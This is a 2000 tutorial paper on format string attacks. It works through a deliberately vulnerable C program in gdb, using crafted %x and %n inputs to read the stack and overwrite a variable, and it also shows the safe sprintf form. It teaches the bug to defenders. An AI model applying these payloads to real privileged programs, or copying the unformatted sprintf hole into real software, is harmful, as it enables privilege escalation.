Format String Attacks: 101
James Bowman
October 17, 2000
Format string attacks, or format bugs, have been theorized about for
many years, but they only began to appear around the midpoint of this year.
It appears that format bugs are going to be just as common as buffer
overflow bugs have been. It started out as a trickle of reports of format
bugs. As people started examining the source code of their programs, the
trickle opened like a faucet. The big reports included the "Qpopper POP3
server format bug" in May, the "wu-ftpd site exec" bug in July, the "rpc.statd
format bug" in August, and the Unix "locale format bug" in September. Apparently,
this is the point at which the national media got hold of the story.
For non-programmers, like myself, it is often helpful to work through
an example of something before we can permanently commit it to memory.
That is what we are going to do with this paper. We will have a brief description
of what format bugs are and then work through a small example program showing
the basics of how they work.
What are they?
Format bugs occur when a program receives unexpected user input. This
is not just any old unexpected input. These inputs are strings specifically
crafted to cause a privileged (suid) Unix program to allow privilege escalation
by a normal user. The format bugs can trick the program into allowing arbitrary
data to be written to the stack. When we can make the privileged program
write arbitrary data to the stack, we "own" the program and we "own" the
computer. There has been talk on the Bugtraq mailing list about the possibility
of format string attacks on Microsoft systems, but I am not aware of any
examples of this. So far, the reported bugs affect only Unix and Linux systems.
What causes them?
Format string attacks are caused by the same things that cause buffer
overflows: lazy or careless programmers. The programmer intends to write
something like this:
sprintf(buf, "%s", str);
But instead he gets lazy and types:
sprintf(buf, str);
He compiles his code and tests it. If it works, why give it a second thought?
If that weren’t the right way to do it, he would get an error from the
compiler, wouldn’t he? Wrong! What your friendly programmer has just done
is hand out the keys to the kingdom. When you run his code on your web
server, file server, mail server, firewall, etc., his application is just
waiting for someone to come along and give the "open sesame" command. Because
our programmer has left out the format string ("%s"), sprintf treats
the string (str) as the format string. This is what will allow the attacker
to compromise the program.
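To make the difference concrete, here is a minimal sketch of the safe form. The helper name copy_as_data is our own invention for illustration and is not part of any program discussed here. Because the format string is the constant "%s", any percent signs in the input are copied as ordinary text. We also use snprintf in place of sprintf so that the copy cannot run past the end of the buffer.

```c
#include <stdio.h>

/* Hypothetical helper: copies str into buf as plain data.
 * The format string is the constant "%s", so percent signs inside
 * str are never interpreted as conversion specifiers. */
int copy_as_data(char *buf, size_t size, const char *str)
{
    return snprintf(buf, size, "%s", str);
}
```

Calling copy_as_data(buf, sizeof buf, "%x %x %n") leaves the literal text %x %x %n in buf and returns 8, the number of characters copied.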
How do they work?
We need a little background information before we start with an example.
The %x conversion specifier tells the sprintf function to output the corresponding
argument in hex format. If there is no corresponding argument, as in the
programming error above, sprintf retrieves whatever value sits on the stack
where the argument would have been. This is not good because we can read values
off the stack that we’re not supposed to see. When the %n specifier is encountered
in the format string, the number of characters output before the %n
is stored at the address passed in the next argument. This
is an important point. Since we have an error in our code and the program
was not expecting to receive format strings as input, there is no next
argument. So instead, sprintf takes the next value off the stack, treats it
as an address, and writes the count there. This is bad,
because an attacker can craft an input string to cause our program to do
something it’s not supposed to do. Let’s look at a simple example of this.
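Before we misuse these two specifiers, it may help to see them behave properly, with every argument supplied. This is only a sketch: the function names hex_of and count_at_n are ours, and we assume a C library with the standard %n behavior (some libraries restrict %n as a hardening measure).

```c
#include <stdio.h>

/* Formats value in hex into out, as %x does when given a real argument. */
int hex_of(char *out, size_t size, unsigned int value)
{
    return snprintf(out, size, "%x", value);
}

/* Returns the count that %n stores: the number of characters
 * output before the %n was reached ("hello" is 5 characters). */
int count_at_n(void)
{
    char out[32];
    int count = 0;

    snprintf(out, sizeof out, "hello%n world", &count);
    return count;
}
```

Here hex_of(buf, sizeof buf, 255) writes "ff" into buf, and count_at_n() returns 5. In both cases the argument really exists, so nothing is pulled off the stack by accident.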
An example:
The following code snippet is our test program. The code uses two buffers
(inbuf and outbuf). We included a target variable, target, just so we can
attack it. The code reads standard input, copies inbuf to outbuf using
sprintf (with no format string), and prints outbuf to the standard output.
[bowmanj@stinkpad Format]$ cat testprog.c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

int main(int argc, char **argv)
{
    char inbuf[100];
    char outbuf[100];
    int target = 1;

    memset(inbuf, '\0', 100);
    memset(outbuf, '\0', 100);

    read(0, inbuf, 100);
    sprintf(outbuf, inbuf); // This is the mistake
    printf("%s", outbuf);
}
The line beginning with the sprintf statement is the hole in our program.
The correct way to write it would be:
sprintf(outbuf, "%s", inbuf);
First, we need to compile the program:
gcc -g -o testprog testprog.c
Now we need to run it in the debugger and give it the string "hello" as
the input:
[bowmanj@stinkpad Format]$ gdb testprog
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) break printf
Breakpoint 1 at 0x8048378
(gdb) run
Starting program: /home/bowmanj/Format/testprog
hello
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) print inbuf
$1 = "hello\n", '\000' <repeats 93 times>
(gdb) print &target
$2 = (int *) 0xbffffa5c
(gdb) print &outbuf
$3 = (char (*)[100]) 0xbffffa60
(gdb) print &inbuf
$4 = (char (*)[100]) 0xbffffac4
(gdb)
We give the program the string "hello" and then print the contents of inbuf
to verify it’s there. The last three debugger commands print where the
variables target, outbuf, and inbuf are in memory. We can now see how the
variables are situated on the stack.
Variable name    Memory location
target           0xbffffa5c
outbuf           0xbffffa60
inbuf            0xbffffac4
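A quick subtraction confirms that the variables sit back to back. The sketch below is only a worked piece of arithmetic on the addresses gdb reported; the macro and function names are ours, chosen for illustration.

```c
#include <stdint.h>

/* Addresses copied from the gdb session above. */
#define TARGET_ADDR 0xbffffa5cu
#define OUTBUF_ADDR 0xbffffa60u
#define INBUF_ADDR  0xbffffac4u

/* Distance in bytes from a lower address to a higher one. */
uint32_t gap(uint32_t low, uint32_t high)
{
    return high - low;
}
```

gap(TARGET_ADDR, OUTBUF_ADDR) is 4, the size of the int target, and gap(OUTBUF_ADDR, INBUF_ADDR) is 100, the size of outbuf. So outbuf begins immediately after target, and inbuf begins immediately after outbuf.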
We’re going to see how we can use the %x format to view any value on
the stack. As we discussed above, this string should print out the argument
following it as a hex number. In our case there is no argument following
it because our string is being interpreted as a format. Let’s see what
happens.
(gdb) run
Starting program: /home/bowmanj/Format/testprog
%x %x %x
1 2031 203133
Program exited with code 016.
(gdb)
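It may not be clear from the example what we’re looking at, so I’ll tell
you. Our program has interpreted the "%x %x %x" as a format and printed
three values off the stack. The "1" is the value of our target variable.
The next two values are the first eight bytes of outbuf, which sits right
after target in memory and already holds the characters sprintf has written
so far: 0x31 is the ASCII code for "1" and 0x20 is a space.
So now we know we can read off the stack. Now we want to write to the
stack.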
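The second and third values in that output can be checked by hand. As a sketch, the helper below (le_word is our name, not a library function) reads four bytes the way the x86 loads an int, least significant byte first. We assume outbuf held "1 " when the second %x was processed and "1 2031 " when the third was processed, which is what the output implies.

```c
#include <stdint.h>

/* Reads four bytes as a little-endian 32-bit word, the way the
 * x86 in this example loads an int from memory. */
uint32_t le_word(const unsigned char *p)
{
    return (uint32_t)p[0]
         | ((uint32_t)p[1] << 8)
         | ((uint32_t)p[2] << 16)
         | ((uint32_t)p[3] << 24);
}
```

With a zero-filled buffer holding "1 ", le_word on its first four bytes gives 0x2031. With the buffer holding "1 2031 ", le_word on bytes four through seven gives 0x203133. Those are exactly the values the program printed.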
Our goal is to show that we can control the value of the target variable
by passing the program an unexpected string with embedded format characters
in it. This is a very simple example but it will illustrate our point.
First we want to get the address of the target variable into outbuf because
we will need to use it to control where sprintf will write the value stored
by the %n specifier. We want to get it into the outbuf buffer
since it is adjacent to the target variable. We’ll use the printf command
to write the four bytes of the address of target into a file, which will
make it easier to get the value into our program. The bytes are given
least significant first because the x86 stores integers in little-endian order.
[bowmanj@stinkpad Format]$ printf "\x5c\xfa\xff\xbf" > infile
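The order of the bytes in that command is easy to get wrong, so here is a small sketch of the conversion. The function name le_bytes is ours; it simply splits a 32-bit address into the sequence a little-endian machine keeps in memory.

```c
#include <stdint.h>

/* Splits a 32-bit address into the byte sequence a little-endian
 * machine stores in memory, least significant byte first. */
void le_bytes(uint32_t addr, unsigned char out[4])
{
    out[0] = (unsigned char)(addr & 0xff);
    out[1] = (unsigned char)((addr >> 8) & 0xff);
    out[2] = (unsigned char)((addr >> 16) & 0xff);
    out[3] = (unsigned char)((addr >> 24) & 0xff);
}
```

For the address 0xbffffa5c this produces 5c, fa, ff, bf, which matches the escapes we passed to printf.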
Now we want to run our test program and see that we have placed the address
of the target variable into outbuf properly using the file, infile, as
our input.
(gdb) set args < infile
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bowmanj/Format/testprog < infile
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) x/60x &target
0xbffffa5c: 0x00000001 0xbffffa5c 0x00000000 0x00000000
0xbffffa6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa8c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa9c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaac: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffabc: 0x00000000 0x00000000 0xbffffa5c 0x00000000
0xbffffacc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffadc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaec: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffafc: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb0c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffb1c: 0x00000000 0x00000000 0x00000000 0xbffffb48
0xbffffb2c: 0x400339cb 0x00000001 0xbffffb74 0xbffffb7c
0xbffffb3c: 0x40013868 0x00000001 0x080483c0 0x00000000
As we can see now we have the address of the target variable (0xbffffa5c)
stored at the beginning of the outbuf buffer (0xbffffa60). Now is where
the fun begins. Now we will use the %n format string we discussed earlier
to our advantage. This is the format string that we will be using to change
the value of the target variable. Our task is to control where it writes.
We will now add a %x and a %n to our input file. This will cause us
to skip over the location of the target variable on the stack and use the
next value off the stack. This next value will be the first four bytes
of outbuf. Recall that we loaded outbuf with the address of the target
variable so this is where the value will be written.
[bowmanj@stinkpad Format]$ printf "\x5c\xfa\xff\xbf%%x%%n" > infile
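To see what we expect this input to do, here is a toy model of the walk sprintf makes through the format. It is not a real printf: it understands only plain %x and %n, and the names n_write and walk_format are ours. We assume, as the gdb session suggests, that the first two words the buggy call picks up are target and the first four bytes of outbuf.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* What a %n in the format would do in this toy model. */
struct n_write {
    int      seen;     /* 1 once a %n has been processed */
    uint32_t address;  /* stack word that %n used as its destination */
    int      value;    /* characters output before the %n */
};

/* Toy model, not a real printf: walks fmt, treating stack[] as the
 * words a buggy sprintf call would pick up in place of its missing
 * arguments. Only plain %x and %n are understood. */
struct n_write walk_format(const char *fmt, const uint32_t *stack,
                           size_t nwords)
{
    struct n_write result = {0, 0, 0};
    size_t next = 0;   /* index of the next stack word to consume */
    int count = 0;     /* characters "output" so far */
    size_t len = strlen(fmt);

    for (size_t i = 0; i < len; i++) {
        if (fmt[i] == '%' && i + 1 < len && next < nwords) {
            if (fmt[i + 1] == 'x') {
                char digits[16];
                /* snprintf returns how many hex digits the word needs */
                count += snprintf(digits, sizeof digits, "%x",
                                  (unsigned int)stack[next++]);
                i++;
                continue;
            }
            if (fmt[i + 1] == 'n') {
                result.seen = 1;
                result.address = stack[next++];
                result.value = count;
                i++;
                continue;
            }
        }
        count++;  /* any other byte is copied to the output as is */
    }
    return result;
}
```

Given the format "\x5c\xfa\xff\xbf%x%n" and the two stack words 1 and 0xbffffa5c, the model counts four address bytes, then one digit for the %x that consumes target, and finally reports a write of the value 5 to address 0xbffffa5c.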
Let’s test it out:
[bowmanj@stinkpad Format]$ gdb testprog
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux"...
(gdb) break 16
Breakpoint 1 at 0x80484c1: file testprog.c, line 16.
(gdb) set args < infile
(gdb) run
Starting program: /home/bowmanj/Format/testprog < infile
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) print target
$1 = 5
(gdb)
We changed the value of target from 1 to 5: by the time sprintf reached the
%n, it had output the four address bytes plus the single digit produced by
the %x. We can change it to other positive numbers by adding a precision
to the %x, which makes its output longer. This changes the value %n stores,
since that value is the count of characters output so far.
[bowmanj@stinkpad Format]$ printf "\x5c\xfa\xff\xbf%%.10x%%n" > infile
Let’s test it again:
(gdb) run
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/bowmanj/Format/testprog < infile
Breakpoint 1, main (argc=1, argv=0xbffffb74) at testprog.c:16
16 printf("%s", outbuf);
(gdb) print target
$2 = 14
(gdb)
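The values 5 and 14 can be reproduced without any bug at all, by giving %x and %n real arguments. In this sketch the four characters "AAAA" stand in for the four address bytes, and the function names are ours. We again assume a C library with the standard %n behavior.

```c
#include <stdio.h>

/* Count stored by %n after four filler bytes and a plain %x of 1. */
int count_plain(void)
{
    char out[64];
    int n = 0;

    snprintf(out, sizeof out, "AAAA%x%n", 1u, &n);
    return n;   /* 4 filler bytes + "1" */
}

/* Same, but with a precision of 10, which pads the hex output
 * with leading zeros to ten digits. */
int count_padded(void)
{
    char out[64];
    int n = 0;

    snprintf(out, sizeof out, "AAAA%.10x%n", 1u, &n);
    return n;   /* 4 filler bytes + "0000000001" */
}
```

count_plain() returns 5 and count_padded() returns 14, the same two values gdb showed in target. Choosing a different precision is how an attacker chooses the number that gets written.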
Therefore, we have shown that we can read arbitrary values off the stack
and we can control the values of variables on the stack. We can choose
where we write by controlling the address we load into the buffer. We can
control what we write by using the precision formats to adjust the count
that %n returns. The next logical step would be to load shell code into
memory and have our program execute it but that is beyond the scope of
this paper.
There are a couple of great tutorials out there by Tim Newsham and Pascal
Bouchareine that explain format bugs in greater detail as well as inserting
shell code. If you are interested in format bugs, I would suggest you read
their papers and work through their examples.
References:
1. Arce, Ivan. "UNIX locale format string vulnerability." September 4,
2000.
URL: http://www.securityfocus.com/archive/1/80154
(October 17, 2000).
2. Bouchareine, Pascal. "More info on format bugs."
URL: http://julianor.tripod.com/kalou-formats.txt
(October 19, 2000).
3. Newsham, Tim. "Format String Attacks." September 2000.
URL: http://www.gaurdent.com/docs/FormatString.PDF
(October 17, 2000).
4. Seifried, Kurt. "Format Strings." September 26, 2000.
URL: http://www.securityportal.com/articles/formatstrings20000926.printerfriendly.html
(October 17, 2000).
5. Seifried, Kurt. "Format Strings: An Interview with Chris Evans."
October 11, 2000.
URL: http://securityportal.com/closet/closet20001011.printerfriendly.html
(October 17, 2000).
6. Shankland, Stephen. "Unix, Linux computers vulnerable to damaging
new attacks." September 7, 2000.
URL: http://news.cnet.com/news/0-1003-202-2719802.html
(October 18, 2000).